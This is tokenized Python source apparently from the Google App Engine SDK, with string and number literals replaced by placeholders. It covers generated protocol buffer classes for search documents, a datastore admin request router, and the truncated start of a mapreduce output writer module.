value_ = FieldValue ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def value ( self ) : return self . value_ <EOL> def mutable_value ( self ) : self . has_value_ = <NUM_LIT:1> ; return self . value_ <EOL> def clear_value ( self ) : self . has_value_ = <NUM_LIT:0> ; self . value_ . Clear ( ) <EOL> def has_value ( self ) : return self . has_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> if ( x . has_value ( ) ) : self . mutable_value ( ) . MergeFrom ( x . value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . value_ . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += self . lengthString ( self . value_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . value_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . value_ . ByteSize ( ) ) <EOL> self . value_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . value_ . ByteSizePartial ( ) ) <EOL> self . value_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_value ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> if self . has_value_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . value_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> kvalue = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT:value>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class FieldTypes ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . type_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name ( self ) : return self . name_ <EOL> def set_name ( self , x ) : <EOL> self . has_name_ = <NUM_LIT:1> <EOL> self . name_ = x <EOL> def clear_name ( self ) : <EOL> if self . has_name_ : <EOL> self . has_name_ = <NUM_LIT:0> <EOL> self . name_ = "<STR_LIT>" <EOL> def has_name ( self ) : return self . has_name_ <EOL> def type_size ( self ) : return len ( self . type_ ) <EOL> def type_list ( self ) : return self . type_ <EOL> def type ( self , i ) : <EOL> return self . type_ [ i ] <EOL> def set_type ( self , i , x ) : <EOL> self . type_ [ i ] = x <EOL> def add_type ( self , x ) : <EOL> self . type_ . append ( x ) <EOL> def clear_type ( self ) : <EOL> self . type_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name ( ) ) : self . set_name ( x . name ( ) ) <EOL> for i in xrange ( x . type_size ( ) ) : self . add_type ( x . type ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_ != x . has_name_ : return <NUM_LIT:0> <EOL> if self . has_name_ and self . name_ != x . name_ : return <NUM_LIT:0> <EOL> if len ( self . type_ ) != len ( x . type_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . type_ , x . type_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_name_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . type_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : n += self . lengthVarInt64 ( self . type_ [ i ] ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . name_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . type_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : n += self . lengthVarInt64 ( self . type_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name ( ) <EOL> self . clear_type ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . type_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_name_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_ ) <EOL> for i in xrange ( len ( self . type_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . type_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_name ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . add_type ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_name_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . type_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kname = <NUM_LIT:1> <EOL> ktype = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:name>" , <EOL> <NUM_LIT:2> : "<STR_LIT:type>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class Document ( ProtocolBuffer . ProtocolMessage ) : <EOL> DISK = <NUM_LIT:0> <EOL> _Storage_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } <EOL> def Storage_Name ( cls , x ) : return cls . _Storage_NAMES . get ( x , "<STR_LIT>" ) <EOL> Storage_Name = classmethod ( Storage_Name ) <EOL> has_id_ = <NUM_LIT:0> <EOL> id_ = "<STR_LIT>" <EOL> has_language_ = <NUM_LIT:0> <EOL> language_ = "<STR_LIT>" <EOL> has_order_id_ = <NUM_LIT:0> <EOL> order_id_ = <NUM_LIT:0> <EOL> has_storage_ = <NUM_LIT:0> <EOL> storage_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . field_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def id ( self ) : return self . id_ <EOL> def set_id ( self , x ) : <EOL> self . has_id_ = <NUM_LIT:1> <EOL> self . id_ = x <EOL> def clear_id ( self ) : <EOL> if self . has_id_ : <EOL> self . has_id_ = <NUM_LIT:0> <EOL> self . id_ = "<STR_LIT>" <EOL> def has_id ( self ) : return self . has_id_ <EOL> def language ( self ) : return self . language_ <EOL> def set_language ( self , x ) : <EOL> self . has_language_ = <NUM_LIT:1> <EOL> self . language_ = x <EOL> def clear_language ( self ) : <EOL> if self . has_language_ : <EOL> self . has_language_ = <NUM_LIT:0> <EOL> self . language_ = "<STR_LIT>" <EOL> def has_language ( self ) : return self . has_language_ <EOL> def field_size ( self ) : return len ( self . field_ ) <EOL> def field_list ( self ) : return self . field_ <EOL> def field ( self , i ) : <EOL> return self . field_ [ i ] <EOL> def mutable_field ( self , i ) : <EOL> return self . field_ [ i ] <EOL> def add_field ( self ) : <EOL> x = Field ( ) <EOL> self . field_ . append ( x ) <EOL> return x <EOL> def clear_field ( self ) : <EOL> self . field_ = [ ] <EOL> def order_id ( self ) : return self . order_id_ <EOL> def set_order_id ( self , x ) : <EOL> self . has_order_id_ = <NUM_LIT:1> <EOL> self . order_id_ = x <EOL> def clear_order_id ( self ) : <EOL> if self . has_order_id_ : <EOL> self . has_order_id_ = <NUM_LIT:0> <EOL> self . order_id_ = <NUM_LIT:0> <EOL> def has_order_id ( self ) : return self . has_order_id_ <EOL> def storage ( self ) : return self . storage_ <EOL> def set_storage ( self , x ) : <EOL> self . has_storage_ = <NUM_LIT:1> <EOL> self . storage_ = x <EOL> def clear_storage ( self ) : <EOL> if self . has_storage_ : <EOL> self . has_storage_ = <NUM_LIT:0> <EOL> self . storage_ = <NUM_LIT:0> <EOL> def has_storage ( self ) : return self . has_storage_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_id ( ) ) : self . set_id ( x . id ( ) ) <EOL> if ( x . has_language ( ) ) : self . set_language ( x . language ( ) ) <EOL> for i in xrange ( x . field_size ( ) ) : self . add_field ( ) . CopyFrom ( x . field ( i ) ) <EOL> if ( x . has_order_id ( ) ) : self . set_order_id ( x . order_id ( ) ) <EOL> if ( x . has_storage ( ) ) : self . set_storage ( x . storage ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_id_ != x . has_id_ : return <NUM_LIT:0> <EOL> if self . has_id_ and self . id_ != x . id_ : return <NUM_LIT:0> <EOL> if self . has_language_ != x . has_language_ : return <NUM_LIT:0> <EOL> if self . has_language_ and self . language_ != x . language_ : return <NUM_LIT:0> <EOL> if len ( self . field_ ) != len ( x . field_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . field_ , x . field_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_order_id_ != x . has_order_id_ : return <NUM_LIT:0> <EOL> if self . has_order_id_ and self . order_id_ != x . order_id_ : return <NUM_LIT:0> <EOL> if self . has_storage_ != x . has_storage_ : return <NUM_LIT:0> <EOL> if self . has_storage_ and self . storage_ != x . storage_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . field_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . id_ ) ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . field_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : n += self . lengthString ( self . field_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_order_id_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . storage_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_id_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . id_ ) ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . field_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : n += self . lengthString ( self . field_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_order_id_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . storage_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_id ( ) <EOL> self . clear_language ( ) <EOL> self . clear_field ( ) <EOL> self . clear_order_id ( ) <EOL> self . clear_storage ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . id_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . field_ [ i ] . ByteSize ( ) ) <EOL> self . field_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_order_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . storage_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . id_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> for i in xrange ( len ( self . field_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . field_ [ i ] . ByteSizePartial ( ) ) <EOL> self . field_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_order_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarInt32 ( self . order_id_ ) <EOL> if ( self . has_storage_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . storage_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_language ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_field ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_order_id ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_storage ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . id_ ) ) <EOL> if self . has_language_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . language_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . field_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_order_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . order_id_ ) ) <EOL> if self . has_storage_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . storage_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kid = <NUM_LIT:1> <EOL> klanguage = <NUM_LIT:2> <EOL> kfield = <NUM_LIT:3> <EOL> korder_id = <NUM_LIT:4> <EOL> kstorage = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:id>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . datastore_admin import copy_handler <EOL> from google . appengine . ext . datastore_admin import delete_handler <EOL> from google . appengine . ext . datastore_admin import utils <EOL> from google . appengine . ext . db import stats <EOL> from google . appengine . ext . db import metadata <EOL> from google . appengine . ext . webapp import util <EOL> GET_ACTIONS = { <EOL> '<STR_LIT>' : copy_handler . ConfirmCopyHandler . Render , <EOL> '<STR_LIT>' : delete_handler . ConfirmDeleteHandler . Render , <EOL> } <EOL> def _GetDatastoreStats ( kinds_list , use_stats_kinds = False ) : <EOL> """<STR_LIT>""" <EOL> global_stat = stats . GlobalStat . all ( ) . fetch ( <NUM_LIT:1> ) <EOL> if not global_stat : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> global_ts = global_stat [ <NUM_LIT:0> ] . timestamp <EOL> kind_stats = stats . KindStat . all ( ) . filter ( '<STR_LIT>' , global_ts ) . fetch ( <NUM_LIT:1000> ) <EOL> if not kind_stats : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> results = { } <EOL> for kind_ent in kind_stats : <EOL> if ( not kind_ent . kind_name . startswith ( '<STR_LIT>' ) <EOL> and ( use_stats_kinds or kind_ent . kind_name in kinds_list ) ) : <EOL> results [ kind_ent . kind_name ] = _PresentatableKindStats ( kind_ent ) <EOL> utils . CacheStats ( results . values ( ) ) <EOL> for kind_str in kinds_list or [ ] : <EOL> if kind_str not in results : <EOL> results [ kind_str ] = { '<STR_LIT>' : kind_str } <EOL> return ( global_ts , <EOL> sorted ( results . values ( ) , key = lambda x : x [ '<STR_LIT>' ] ) ) <EOL> def _KindsListToTuple ( kinds_list ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , [ { '<STR_LIT>' : kind } for kind in sorted ( kinds_list ) ] <EOL> def _PresentatableKindStats ( kind_ent ) : <EOL> """<STR_LIT>""" <EOL> count = kind_ent . count <EOL> total_bytes = kind_ent . bytes <EOL> average_bytes = total_bytes / count <EOL> return { '<STR_LIT>' : kind_ent . kind_name , <EOL> '<STR_LIT:count>' : utils . FormatThousands ( kind_ent . count ) , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( total_bytes ) , <EOL> '<STR_LIT>' : total_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( average_bytes ) , <EOL> } <EOL> class RouteByActionHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def ListActions ( self , error = None ) : <EOL> """<STR_LIT>""" <EOL> use_stats_kinds = False <EOL> kinds = [ ] <EOL> try : <EOL> kinds = self . GetKinds ( ) <EOL> if not kinds : <EOL> use_stats_kinds = True <EOL> except datastore_errors . Error : <EOL> use_stats_kinds = True <EOL> last_stats_update , kind_stats = _GetDatastoreStats ( <EOL> kinds , use_stats_kinds = use_stats_kinds ) <EOL> template_params = { <EOL> '<STR_LIT>' : kind_stats , <EOL> '<STR_LIT>' : self . request . path + '<STR_LIT:?>' + self . request . query_string , <EOL> '<STR_LIT>' : last_stats_update , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sorted ( GET_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : utils . DatastoreAdminOperation . all ( ) . fetch ( <NUM_LIT:100> ) , <EOL> } <EOL> utils . RenderToResponse ( self , '<STR_LIT>' , template_params ) <EOL> def RouteAction ( self , action_dict ) : <EOL> action = self . request . get ( '<STR_LIT:action>' ) <EOL> if not action : <EOL> self . ListActions ( ) <EOL> elif action not in action_dict : <EOL> error = '<STR_LIT>' % action <EOL> self . ListActions ( error = error ) <EOL> else : <EOL> action_dict [ action ] ( self ) <EOL> def get ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def post ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> def GetKinds ( self ) : <EOL> """<STR_LIT>""" <EOL> kinds = metadata . Kind . all ( ) . fetch ( <NUM_LIT> ) <EOL> kind_names = [ ] <EOL> for kind in kinds : <EOL> kind_name = kind . kind_name <EOL> if ( kind_name . startswith ( '<STR_LIT>' ) or <EOL> kind_name == utils . DatastoreAdminOperation . kind ( ) ) : <EOL> continue <EOL> kind_names . append ( kind_name ) <EOL> return kind_names <EOL> class StaticResourceHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> _BASE_FILE_PATH = os . path . dirname ( __file__ ) <EOL> _RESOURCE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get ( self ) : <EOL> relative_path = self . request . path . split ( utils . config . BASE_PATH + '<STR_LIT:/>' ) [ <NUM_LIT:1> ] <EOL> if relative_path not in self . _RESOURCE_MAP : <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> return <EOL> path = os . path . join ( self . _BASE_FILE_PATH , relative_path ) <EOL> self . response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = self . _RESOURCE_MAP [ relative_path ] <EOL> if relative_path == '<STR_LIT>' : <EOL> self . response . out . write ( <EOL> open ( path ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . response . out . write ( open ( path ) . read ( ) ) <EOL> def CreateApplication ( ) : <EOL> """<STR_LIT>""" <EOL> return webapp . WSGIApplication ( [ <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> delete_handler . ConfirmDeleteHandler . SUFFIX ) , <EOL> delete_handler . ConfirmDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> delete_handler . DoDeleteHandler . SUFFIX ) , <EOL> delete_handler . DoDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( utils . config . BASE_PATH , <EOL> utils . MapreduceDoneHandler . SUFFIX ) , <EOL> utils . MapreduceDoneHandler ) , <EOL> ] + copy_handler . handlers_list ( utils . config . BASE_PATH ) + [ <EOL> ( r'<STR_LIT>' % utils . config . BASE_PATH , StaticResourceHandler ) , <EOL> ( r'<STR_LIT>' , RouteByActionHandler ) , <EOL> ] ) <EOL> APP = CreateApplication ( ) <EOL> def main ( ) : <EOL> util . run_wsgi_app ( APP ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> import gc <EOL> import string <EOL> import time <EOL> from google . appengine . api import files <EOL> from google . appengine . api . files import records <EOL> from google . appengine . ext . mapreduce import errors <EOL> from google . appengine . ext . mapreduce import model <EOL> from google . appengine . ext . mapreduce import operation <EOL> COUNTER_IO_WRITE_BYTES = "<STR_LIT>" <EOL> COUNTER_IO_WRITE_MSEC = "<STR_LIT>" <EOL> class OutputWriter ( model . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def init_job ( 